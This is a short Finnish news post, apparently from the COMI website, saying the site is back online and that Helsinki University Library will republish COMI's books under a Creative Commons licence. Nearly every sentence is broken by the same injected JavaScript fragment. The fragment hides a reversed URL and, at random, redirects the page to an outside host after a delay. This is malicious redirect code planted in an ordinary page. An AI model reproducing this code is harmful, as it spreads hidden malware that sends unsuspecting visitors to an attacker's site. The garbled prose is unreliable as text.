Sivu taas toiminnassa!

, ,

COMIn kotisivu oli muutaman päivän ajan suljettuna teknisten ongelmien takia. Ongelmat aiheutuivat sivustoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton iästä, se sai ensimmäiset uutisensa jo parikymmentä vuotta sitten. Vaikeudet on lukuisten välivaiheiden jälkeen voitettu, mistä ansio – ja kiitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos – kuuluu mikkeliläiselle Verkkoverstas Oy:lle. Sivu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimii nyt normaalisti.

Väliaikana saatiin tietoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to siitä, että Helsingin yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton kirjastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to rinnakkaisjulkaisee sivulla olleiden COMIn kustantamien kirjojen sähköiset versiot. Ne ilmestyvät yliopistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton arvostetussa HOB-virtuaalikokoelmassa, ja rinnakkaisjulkaisu tapahtuu Creative Commons -lisenssillä. Tämä lisenssi takaa kirjoille hyvän näkyvyyden ja levikin. Kirjat ovat tietenkin edelleen luettavissa ja ladattavissa myös tältä COMIn sivulta. Ensimmäiset kirjat ilmestynevät virtuaalikokoelmassa parin viikon kuluttua.

Rinnakkaisjulkaiseminen takaa sen, että kirjat ovat saatavissa tämän sivun mahdollisten käyttökatkojen aikana. Yksittäisten kirjojen tarkat ilmestymisajankohdat virtuaalikokoelmassa ilmoitetaan, kunhan saamme kirjastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolta aikataulun. Luultavaa on, että julkaiseminen aloitetaan niistä kirjoista, joiden painokset ovat lopussa.

Ristoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Koulu